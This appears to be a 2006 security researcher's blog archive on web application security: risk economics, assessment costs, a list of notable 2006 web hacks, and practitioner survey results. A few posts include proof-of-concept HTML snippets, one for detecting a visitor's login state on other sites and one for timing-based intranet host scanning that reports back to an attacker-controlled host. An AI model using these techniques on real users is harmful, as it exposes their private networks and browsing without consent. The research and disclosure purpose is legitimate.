Thursday, December 28, 2006
"Once flaws have been identified, what is my motivation to fix them? If you can't give me the likelihood of attack, and what I stand to lose by it being exploited, how many dollars should I invest to repairing it?"
As security practitioners, we continue to say how much the development environments need to learn to make secure software. I'd say there's another side to that coin - security practitioners need to be able to measure the impact of particular threats in terms of dollars so that we don't just reveal vulnerabilities and the threats that might exploit them, but what the business stands to lose of the vulnerability isn't fixed.
Very well stated and got me thinking about how this could be done. For some reason the movie Fight Club popped into my head with the scene about how Jack, as a automative manufacture recall coordinator, applied "the formula". Seemed like a fun way to go about it. :)
I'm a recall coordinator. My job is to apply the formula.
Take the number of vehicles in the field, (A), and multiply it by the probable rate of failure, (B), then multiply the result by the average out-of-court settlement, (C). A times B times C equals X...
If X is less than the cost of a recall, we don't do one.
Are there a lot of these kinds of accidents?
Oh, you wouldn't believe.
... Which... car company do you work for?
A major one.
I know I know, I broke the first rule of Fight Club. Anyway, I have no idea how "real" this formula is or if its applied, but it seemed to make sense. I wondered if something similar could be applied to web application security. And if nothing else, an entertaining exercise.
Take the number of known vulnerabilities in a website, (A), and multiply it by the probability of malicious exploitation, (B), then multiply the result by the average average financial cost of handling a security incident, (C). A times B times C equals X...
If X is less than the cost fixing the vulnerabilities, we won't.
Sounds like it could work given you could be somewhat accurate in filling in the variables, which is the hard part. The thing is this process probably isn't a suitable task for an information security person. Maybe we need to seek the assistance of an economist of a probability theorist and see what they have to say.
I think the reason behind the lack of consensus is due to void of data and/or a means to measure success. We’re essentially flying blind. Let’s rhetorically consider several questions people commonly ask:
“How do I find out how many websites I have?”
“What do they do and how *important* are they?”
“Who’s responsible for them?”
Digging into a single website….
“How large and complex is the code base?”
“What’s the rate of application code change?”
Narrowing down to vulnerabilities…
“What vulnerabilities do I have?”
“Who’s fault is it and how do I prioritize their remediation?”
“What do I do to protect myself in the meantime?”
Finally organizational changes…
“Which should I focus on, developer education or the use of a modern development framework?”
“Which testing process is better, white box or black box or glass box?”
Answering these questions is anything but simple, largely dependent on any number of factors, unknown to any single person, and varies from organization to organization. The point is an organization must be able to understand its current state of affairs. And we as an industry must be able measure if a particular strategy or solution is working and if so how well. This brings us to where I think we are today. Best-practices based upon conventional wisdom held over from other areas of information security, which do not apply here. A harsh reality.
To begin looking at things in fresh and new perspective, I find its helpful to line up the "knowns" and "unknowns" for a particular problem set. From there it’s easier to spot trends, relationships, inconsistencies, and areas that should yield immediate return from investigation.
- In what would normally be considered the largest, most popular, and “secure” websites, it’s found the vast majority have serious vulnerabilities. We have no idea about the security of the mid and lower end websites which are typically not assessed.
- Those typically in charge of information security do not have the same level of control over the safety of their websites as they do at the network infrastructure level. Consequently, the responsibility of website security is unassigned or rests among several constituencies.
- Attacks targeting the web application layer are growing year over year in number, sophistication, and maliciousness. Real would visibility into these attacks are extremely limited.
- Firewalls, patching, configuration, transmission/database encryption, and strong authentication solutions do not protect against the majority of web applications vulnerabilities.
- All software has defects and in turn will have vulnerabilities. Security enhancements provided by modern development frameworks help to prevent vulnerabilities, though will not eliminate them altogether. Measured benefit is unknown.
- Change rate of commerce web applications is relatively rapid updated with incremental revisions. Traditional PC or enterprise software tends to be slower with larger versioned builds. Web applications tend to have a steady and faster flow of vulnerabilities.
- Developer education in software security and implementing security testing inside the quality assurance phase reduces the number of vulnerabilities, but will not eliminate them. See #5. The overall expected reduction of vulnerabilities as a result is unknown.
- It’s impossible to find all vulnerabilities through automation, which requires a significant amount of experienced human time to complete thorough security testing. How much time is required and how close the process will come to finding everything is debatable.
- Web application security is a new and complex subject for which there is a limited population of experienced practitioners relative to the amount of workload.
- Web browser security is largely and fundamentally broken leaving unable to protect users against modern attacks. The situation hasn’t significantly improved with Firefox 2.0 or Internet Explorer 7.0. and it’s unclear it future releases will attempt to address the problem.
- Solutions must come from areas other than "fixing" the code
- We need to invest resources into measuring ROI from various solutions and best-practices
- Create training and perhaps certification programs for web application security professionals
- We need wider visibility into the real-world hacks
- We need to develop and implement new and innovated security designs for modern web browsers
Tuesday, December 26, 2006
Where are we now?
- 105 million sites are on the Web with 4 million new ones each month.
- Perhaps hundreds (?) of thousands of websites collect or distribute personal information, financial and healthcare data, credit card numbers, intellectual property, trade secrets, etc.
- Web application issues top every major Top-X vulnerability list.
- 8 out 10 websites are full of holes and most of the attacks are targeting the web application layer.
- Assessments should be performed after each code change or "major" release and require about a week or two of human-time to complete.
Analyzing the scope using some assumptions:
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform 40 assessments per year with base salary of $100,000 (US).
- Retail cost per assessment $5,000 (US). (Normally higher ranging between $8,000 - $15,000)
Today we'd need:
- 1 million total vulnerability assessments
- 25,000 experienced experts in web application VA
- $2,500,000,000 (US) in salary for web application experts
- $5,000,000,000 (US) retail assessment cost
Of course as the awareness of web application security builds the numbers will climb, but for now we have to face facts. And the fact is unless we can vastly improve the web application VA process, most websites will not be assessed for security and remain insecure. That’s what’s going on today. And that’s why I’m saying the future of web application vulnerability assessment is about scale.
While we certainly can’t reduce the number of “important” websites, can reduce the number of man-hours and expertise required to perform an assessment using technology and a modern processes. Modern assessment processes need to be highly streamlined, repeatable, thousands running concurrently and performable by less than top-tier webappsec experts. This is what it truly means to “scale”.
How much improve can be made near term is a subject of much debate, but we’re working on it. For fun, let’s try a few more guesses at how certain efficiencies will help.
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform
40200 assessments per year with base salary of $100,000$80,000 (US).
- Retail cost per assessment
- 1 million total vulnerability assessments
- 5,000 experienced experts in web application VA
- $2,000,000,000 (US) in salary for web application experts
- $400,000,000 (US) retail assessment cost
Friday, December 22, 2006
Secure Code Through Frameworks
105 million sites make their home on the Web - 4 million more move in each month. That’s a staggering number to think about, and as we well know, the vast majority of websites (I say 8 in 10) have serious security issues. Industry discussions go round and round about what should be done. We talk about secure coding practices, training, compliance, assessment, source-code audits, and the like. What’s going to work? Then I read something Robert Auger posted, the lack of security enabled frameworks is why we’re vulnerable, touching on an area I’ve thought a lot about recently.
Friday, December 15, 2006
Attacks always get better, never worse. That’s what probably what I’ll remember most about 2006. What a year it’s been in web hacking! There’s never been such a big leap forward in the industry and frankly it’s really hard to keep up. My favorite quote came today from Kryan:
To look back on what’s been discovered RSnake, Robert Auger, and myself collected as many of the new 2006 web hacks as we could find. We’re using the term "hacks" loosely to describe some of the more creative, useful, and interesting techniques/discoveries/compromises. There were about 60 to choose from making the selection process REALLY difficult. After much email deliberation we believe we created a solid Top 10. Below you’ll find the entire list in no particular order. Enjoy!
- Internet Explorer 7 "mhtml:" Redirection Information Disclosure
- Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
- Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images)
- Backdooring Media Files (QuickTime, Flash, PDF, Images, Word , and MP3's)
- Forging HTTP request headers with Flash
- Exponential XSS
- Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII)
- Web Worms - (AdultSpace, MySpace, Xanga)
- Hacking RSS Feeds
- Stealing User Information Via Automatic Form Filling
- Advanced Web Attack Techniques using GMail (Overwriting the Array
- Google Vulnerable Code Dork
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
CSS History Stealing Acts As Cookie
Detecting FireFox Extentions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Selecting Encoding Methods For XSS Filter Evasion
Adultspace XSS Worm
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again
Thursday, December 14, 2006
The CSS History hack is a well-known brute force way to uncover where a victim user has traveled. Great Firefox extensions like SafeHistory are helping protect against this simple hack, but the cat and mouse game continues. Despite this tool, I’ve found a new way to tell where the user has been AND also if they are “logged-in”. People are frequently and persistently logged-in to popular websites. Knowing which websites can also be extremely helpful to improving the success rate of CSRF or Exponential XSS attacks as well as other nefarious information gathering activities.
Using Gmail as an example, <* script src=” http://mail.google.com/mail/”>
If you are logged-in…
If you are NOT logged-in…
I mapped the error messages from a few popular websites and made some PoC code.
Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. I don’t want to hear it about IE and Opera. :)
Wednesday, December 13, 2006
Research in 2006
Right on the money. Of course this might have been a self-fulfilling prophecy. :) Those are the best kind.
Commercial landscape in 2006
Personally I think compliance, specifically PCI, is going to be a big driver to improve web application security.
Blech, way off. PCI is a good standard with decent web application security components, but the enforcement of validation of compliance leaves something to be desired. When network scanning vendors can meet the minimum webappsec criteria with only the most rudimentary checks, then clearly there is improvement required. Checkbox != security. Maybe PCI will be a real driver by 2008. Time will tell.
To meet the requirements, I expect vendors will combine various types of vulnerability assessment products through innovation or acquisition. Current product/service offerings separate network, cgi, and web application assessment layers. Some combine 2, but not all three.
Off again yet again. I stil think this will happen, just don't know exactly when. I thought it would have taken place already.
To pass PCI quickly, we'll see people looking for simple solutions or hacks to clean up their vulnerabilities. Not everyone has the resources available to fix their web app code the right way. As a result, I expect new web server add-ons (or WAF's) and configuration set-ups will be employed as band-aids to prevent the identification of vulnerabilities. This is create an interesting challenge for the industry.
Let's call this a 50/50, I was correct about a huge increase in web application firewall deployments in the market led by ModSecurity and other commercial players. Way more WAF's on the Web than there were in 2004 and 2005. However, this didn't have anything to do with meeting PCI or a band-aid approach as I guessted. Most deployments I've seen have been towards defense-in-depth, bravo, but I was wrong in the prediction. :)
Then a few other predictions:
* a variety of different product/service standards
* certifications web application security professionals
* other industries begin implementing PCI-like security standards
Sheesh, way off.
I'm no Nostradamus thats for sure.
Friday, December 08, 2006
"A few years back, Yahoo Games instituted an online chess ladder. A ladder system essentially ranks all the players from top to bottom, and you move up by beating people ranked higher on the ladder. Losing (or not playing) slowly lowers your ranking.
I'm a decent player—I won the state championship of Kentucky in my salad days—but couldn't begin to approach the top of Yahoo's ladder. But guess what? The people at the top weren't playing chess at all!
They were cheaters, a closed circle of players passing the crown around by systematically losing one-move games to each other. Player No. 2 challenges Player No. 1, makes one move to start the game, and then Player No. 1 resigns the game and they switch rankings on the ladder. "
There are literally thousands of people (or more) with an amazing about of free time to do the most mundane tasks for the most inane rewards. “Cheating” players would code purpose built programs to bot 100’s of chess games 24x7 simultaneously. They’d sit up late into the evening because every so often the ladder ranks would be reset, and when they did, they’d snatch the top spots. And once they owned a block of the top spots they’d only play within their controlled accounts to rise slowly in ranks. The way the ladder logic worked, “legit” ranked players must play against other equally or higher rank players, and since cheaters wouldn’t play against them, legit players would drop in rank.
All that just to be at the top of the Yahoo Chess games ladder. No monetary reward, no praise, no nothing. Makes you think where else this is going on doesn’t it?
Thursday, December 07, 2006
Wednesday, December 06, 2006
"The scary unknown is intranet Website vulnerability, however, which the survey did not address. "There are no good metrics for how many intranet Websites there are, or how vulnerable they are. That's a big unknown in the industry," Grossman says. "It's a whole other world inside the firewall."
Update: Once again a great survey turn out. A total of 63 respondents. Thank you everyone whom responded and those who helped me out with the questions. We didn't reach my 100 prediction, but that's OK because I'm not very good at those anyway. :) We'll try to get there in January. The problem is its getting difficult to manage this by email, I'll have to figure out some way to remedy that. The data collected certainly did not disappoint and some interesting things bubbled to the top.
Good representation from both security vendors and enterprise professionals. Most of which have several years of experience, a significant percentage of their time dedicated to web application security, and performed 1 - 40 assessments in 2006. An experienced bunch I’d say.
About half of organizations have vulnerability assessments performed see security measurement as the primary security driver and about a quarter say compliance. I would have figured measurement would have scored higher and compliance lower. Maybe we’re seeing a shift in the industry.
The vast majority of webappsec professionals believe assessments should be performed after each code change or "major" release, takes a week or two to complete, and rarely encounter multi-factor authentication or web application firewalls. About half of people using commercial scanners say scanner complete about half or less of their workload. The other half of people who don’t say assessment are faster to do by hand, have too many false positives, or too expensive. There is much more to talk about here, but that’ll come in another post.
Question 12a on disclosure yielded some interesting results. There majority of people are evenly split between “responsible” and “non” disclosure. Think about that. Just as many as are disclosing as those who don’t because there is inherent risk. As I’ve said before, discovery is going to be a big issue moving forward. We’re going to loose the check and balance we’ve relied upon with traditional commercial and open source software.
Its been a month already since the last survey. In November we got a great turn out doubling the response from October. Maybe this time we'll reach 100 respondents. Anyway...
If you perform web application vulnerability assessments, whether personally or professionally, this survey is for you. 15 multiple choice questions designed to help us understand more about the industry in which we work. Most of us in InfoSec dislike taking surveys, however the more people who respond the more informative the data will be. So far the information collected has been really popular and insightful. And a lot of people helped out with the formation of these questions.
- Open to those who perform web application vulnerability assessments/pen-tests
- Email your answers to jeremiah __at__ whitehatsec.com
- To curb fake submissions please use your real name, preferably from your employers domain.
- Submissions must be received by December 14.
Privacy: Absolutely no names or contact information will be released to anyone. Though feel free to self publish your answers (blogs).
1) What type of organization do you work for?
a) Security vendor / consultant (63%)
b) Enterprise (23%)
e) Other (please specify) (10%)
c) Government (5%)
d) Educational institution (0%)
2) What portion of your job is dedicated to web application security (as opposed to development, general security, incident response, etc)?
a) All or almost all (53%)
b) About half (28%)
c) Some (20%)
d) None (0%)
3) How many years have you been working in the web application security field?
c) 2 - 4 (33%)
e) 6+ (25%)
d) 4 - 6 (20%)
b) 1 - 2 (13%)
a) Less than a year (10%)
4) In your experience, what's the primary reason why organizations have web application vulnerability assessments performed?
a) To measure how secure they are, or not (53%)
b) Industry regulation and/or compliance (25%)
c) Customers or partners ask for independent third-party validation (10%)
e) Other (please specify) (10%)
d) No idea (3%)
5) How often should web applications be assessed for vulnerabilities?
a) After every code change (65%)
e) Other (please specify) (20%) - Answers mostly revolved around "major" releases.
c) Quarterly (10%)
b) Annually (5%)
d) Before the auditors arrive (0%)
6) How many web application vulnerability assessments have you personally conducted this year (2006)?
b) 1 - 20 (50%)
c) 20 - 40 (23%)
d) 40 - 60 (13%)
e) 60+ (10%)
a) None (5%)
7) How many man-hours does it take you to complete a web application vulnerability assessment on the average website?
c) 20 - 40 (50%)
b) 0 - 20 (23%)
d) 60 - 80 (23%)
e) 80+ (5%)
a) None (0%)
Please ONLY answer ONE of the two following questions (#8 and #9)
Commercial Vulnerability Scanners: (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)
8) If commercial vulnerability scanners ARE part of your tool chest, how much of your preferred assessment methodology do they complete? 36 respondents (57%)
c) About half (58%)
d) A little bit (33%)
e) Not much (4%)
b) Most of it (4%)
a) All or almost all (0%)
9) If commercial vulnerability scanners are NOT part of your tool chest, why not? 27 respondents (43%)
d) Some combination of a, b, and c (61%)
a) Too many false positives (11%)
c) Faster to do assessments by hand (11%)
b) Too expensive (6%)
e) Haven't tried any of them (6%)
f) Other (please specify) (6%)
10) How often do you encounter web application firewalls blocking your attacks during a vulnerability assessment?
d) Never, or almost never (73%)
c) Sometimes (10%)
e) Hard to tell (10%)
b) About half of the time (5%)
a) A lot (3%)
11) While performing web application vulnerability assessment, how often do you encounter websites requiring multi-factor authentication?
(Hardware token, software token, secret questions, one-time passwords, etc.)
d) Never, or almost never (50%)
c) Sometimes (35%)
b) About half of the time (8%)
a) A lot (5%)
e) Hard to tell (3%)
12a) If you find a vulnerability in a website you don't have written permission to test, what do you do with the data MOST of the time?
b) Inform the website administrators (responsible disclosure) (36%)
c) Keep it to yourself, no sense risking jail or lawsuits (36%)
e) Other (please specify) (18%)
a) Post it sla.ckers.org (full-disclosure) (8%)
d) Sell it (3%)
Daniel Cuthbert: "WALK AWAY! spending 1 year fighting the british government over this exact thing made me realise this lone cowboy approach will never work :0)"
12b) How has the security of the average website changed this year (2006) vs. last year (2005)?
c) Same (50%)
b) Slightly more secure (28%)
d) Worse (20%)
a) Way more secure (3%)
e) No idea (0%)
13) What do you think of RSnake's XSS cheat sheet.
b) I like it (55%)
a) It rocks! (28%)
c) It has the basics, but there are more options (13%)
e) Never heard of it (5%)
d) Lame (0%)
c) No (38%)
b) Sometimes (33%)
a) Yes (18%)
d) Only when clicking on links from Jeremiah (10%)
15) What operating system are you using to answer this question?
a) Windows (68%)
b) OS X (15%)
c) Linux (15%)
d) BSD (3%)
e) Other (please specify) (0%)
16) The most valuable web application security tip/trick/idea/concept/hack/etc you learned this year (2006)? List just 1 thing. *Full list will be published*
When forms convert lower case to uppercase, use VBScript to test for XSS
When spidering a website use your standard USER AGENT, then crawl it agai
The research and disclosure being done on sla.ckers.org and gnucitizen.org.
I don't remember.
combination of XSS and XHR. (My next PoC will show you why)
Blind SQL injection in MSSQL and MySQL, complex XSS injection (using the
I can tell you, but then I will have to sign you on an NDA :-)
mhtml: vulnerability - complete read access to the Internet on Internet
This might not be web app. related until after Vista is released (yeah, right).
I found interesting the concept of how to discover whether Visual Studio binaries have been /GS compiled; Used to mitigate local stack variable overflows.
Sorry, I'm restricted from saying. :/ I guess my best/most valuable tip that I use every time is don't become dependent on any one tip/trick/idea/concept/hack. :)
What cross domain restrictions? The web security model was completely smashed up this year and I don't pretend to claim to be smart enough to fix it. But what we got isn't working the way we thought it did.
I've found some new tools to try out, such as TamperIE, which I picked up from the "Hacking Web Applications Exposed 2nd Edition" book I purchased, and I believe you wrote the foreword. Plus I have to hand it to RSnake, id, maluc and the other people on sla.ckers.org, they just keep coming up with new attack vectors. Their disclosures can be a little frightening. As you said in the foreword, sometimes we just want to bury our head in the sand because we know most of the sites out there have vulnerabilities.
CSRF (Just after I tested a bloody forum too!)
impoving my XSS knowledge with the awesome help of ha.ckers.org and sla.ckers.org
Learning more about web servicves, SOAP, XML, etc.
That demonstrating issues to a vendor/customer is much less effective
than expressing the business liabilty and risk expressed in $s :-)
Fully understanding AJAX, which is important, even if all I learned was that it wasn't as big a deal as I expected it to be (from a security standpoint it is a much bigger deal from developer and user viewpoints).
There is nothing new under the sun. People still do dumb things.
XSS + Ajax avoids the same-domain security sandbox.
Bypassing filtering mechanims by UTF-16 encoding URLs even when there's no need to
Using POST content as a query string in most cases won't effect the way the receiving application reacts. Attacks are more portable and easier to demonstrate in link format.
Implications of Flash 9 crossdomain.xml, including flaws in the implementation and severe lack of best practice standards. The floodgates may be open on client-side code with cross-domain privileges (Quicktime, etc.), but it's good to see a misstep at least happening in the right direction.
This is my statement for the web application security year 2006:
Everyone can find a XSS vulnerability but fortunately only a few people can imagine what this really means.
Automating viewstate injection. Maybe I'll release some notes about it.
Nothing can replace experience!
Watch out for that stupid UTF-7 encoding.
Search myspace for answers to secret questions :)
Intranet IP scanning really opened up my thinking of what XSS could be used to accomplish.
Sunday, December 03, 2006
Thursday, November 30, 2006
"The hype surrounding AJAX and security risks is hard to miss. Supposedly, this hot new technology responsible for compelling web-based applications like Gmail and Google Maps harbors a dark secret that opens the door to malicious hackers. Not exactly true. Even the most experienced Web application developers and security experts have a difficult time cutting through the buzzword banter to find the facts. And, the fact is most websites are insecure, but AJAX is not the culprit. Although AJAX does not make websites any less secure, it’s important to understand what does." read more...
Wednesday, November 29, 2006
He’s right of course. In the past 18 months it seems everything web browser related has been hacked. The same-origin policy, cookie security policy, history protection, the intranet boundary, extension models, flash security, location bar trust, and other sensitive areas have all been exposed. Web security models are completely broken and heck it’s spooky to even click on links these days. If we didn’t/don’t rely on client-side (browser) security, none of these discoveries would have mattered and none of us would have cared. But we do! Why is that?
You see when a user logs-in to a website, the first thing they must have is a reasonable assurance that the web page their visiting is from whom it claims to be. It could easily be a phishing site. Without a visually trustable location bar, SSL/TLS lock symbol, or HTML hyperlink display the user could be tricked into handing over their username/password to an attacker. Which of course could in-turn be used to illegally access our websites. Website security depends on the user not being *easily* tricked, but this does happen hundreds or maybe thousands of times a day.
This moves us to transport security. We don’t want sensitive data compromised by an attacker sniffing the web-browser-web server connection. If for some reason the browser has a faulty implementation of SSL/TLS (it happens) the crypto can be cracked and any sensitive data our website collects could fall into the wrong hands. Our website may remain safe and sound, but the data isn’t and that’s really the whole idea. Websites are relying on the browser to have a solid SSL/TLS implementation otherwise back to plaintext we go.
So maybe we are already trusting client-side (web browser) security. And with the web security models being set-up the way they are, we probably have to keep doing so for years to come.
Update: Kelly Jackson Higgins, from Dark Reading, posted some quality coverage in Where the Bugs Are.
It’s been busy morning. I presented two popular webinars on "First Look at New Web Application Security Statistics - The Top 10 Web Application Vulnerabilities and their Impact on the Enterprise" [slides]. We've been offering the WhiteHat Sentinel Service for several years and in that time we've performed thousands of assessments on real-world websites. As a result we’ve collected a huge database of custom web application vulnerabilities, which to the best of my knowledge is the largest anywhere. Starting January 2007 we’ll be releasing a Web Application Security Report containing statistics derived from that data. Instead of waiting the two months, we’re figured we’d release some statistics early as a taste of things to come:
"Web applications are now the top target for malicious attacks. Why? Firstly, 8 out of 10 websites have serious vulnerabilities making them easy targets for criminals seeking to cash in on cyber crime. Secondly, enterprises that want to reduce the risk of financial losses, brand damage, theft of intellectual property, legal liability, among others, are often unaware that these web application vulnerabilities exist, their possible business impact, and how they are best prevented. Currently, this lack of knowledge limits visibility into an enterprise’s actual security posture. In an effort to deliver actionable information, and raise awareness of actual web application threats, WhiteHat Security is introducing the Web Application Security Risk Report, published quarterly beginning in January 2007."
Webinar slides and the full report [registration required] are available for download.
We're seeing more statistics and reviews released to the public. This is great news because it helps us all understand more about what’s going on, what’s working, and what’s not. The benefit of assessing hundreds of websites every month is you get to see vulnerability metrics as web applications change. The hardest part is pulling out the data that's meaningful. If anyone has ideas for stats they’d like to see, let us know. In the meantime, I’ll post some of the graphics below, enjoy!
The types of vulnerabilities we focus on (vulnerability stack) and the level of comprehensiveness (technical vulnerabilities and business logic flaws)
How bad is it out there? 8 out and 10 websites are vulnerable, but how severe are they.
The likelihood of a website having a high or medium severity vulnerability, by class.
<* meta http-equiv="refresh" content="5;url=http://foo/">
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
What I found was that while the LINK HTTP request is waiting, META refreshes won’t fire until is resolved. Weird. Again, I don’t know how this is useful, yet, but it could be for something in the future.
Use a SCRIPT tag to SRC in any invalid file type, like an image.
<* script src="1.jpg"><* /script>
To suppress the error message, use a type attribute with any value:
<* script src="1.jpg" type="put_anything_here"><* /script>
How is this useful? I don't know, but its weird eh?
More to come.
Tuesday, November 28, 2006
Update: A sla.ckers.org project thread has been created to exchange results. Already the first post has some interesting bits.
HTML is hosted on an "attacker" control website.
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
<* img src="http://attacker/check_time.pl?ip=192.168.1.100&start= epoch_timer" />
The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is as a timer and data transport mechanism back to the attacker. One the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial “epoch_timer” value (when the web page was dynamically generated) its possible to tell if the host is up. If the time difference is less than say 5 seconds then likely the host is up, if more, then the host is probably down (browser waited for timeout). Simple.
Example (attacker web server logs)
Current epoch: 1164762279
(3 second delay) - Host is up
Current epoch: 1164762286
(10 second delay) - Host is down
A few browser/network nuances have caused stability and accuracy headaches, plus the technique is somewhat slow to scan with. To fork the connections I used multiple IFRAMES HTML connections, which seemed to work.
<* iframe src="/portscan.pl?ip=192.168.201.100" scrolling="no"><* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.101" scrolling="no"><* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.102" scrolling="no"><* /iframe>
I'm pretty sure most of the issues can be worked around, but like I said, I lack the time. If anyone out there takes this up as a cause, let me know, I have some Perl scraps if you want them.
Monday, November 27, 2006
Wednesday, November 22, 2006
In network scanning the list of “well-known” vulnerabilities is large, but also finite. Databases such as OSVDB, SecurityFocus, MITRE (CVE), and others catalog the known universe of issues. Vulnerability coverage by network scanners is likely close to 100%. In “custom” web applications the luxury of well-known vulnerabilities or database repositories vanishes. Each new vulnerability identified is more or less a one-off / zero-day issue. Just as with bugs in application code, we truly never know how many vulnerabilities exist in a web bank, e-commerce store, payroll system, or any other custom web application. The upper bound in an unknown. Therefore we can never know for sure if any scan/assessment found them all. Vulnerability coverage could be as low as 10-20% or higher in the range of 80-90% or more. The point is we don’t know, its difficult to measure, and changes with each website.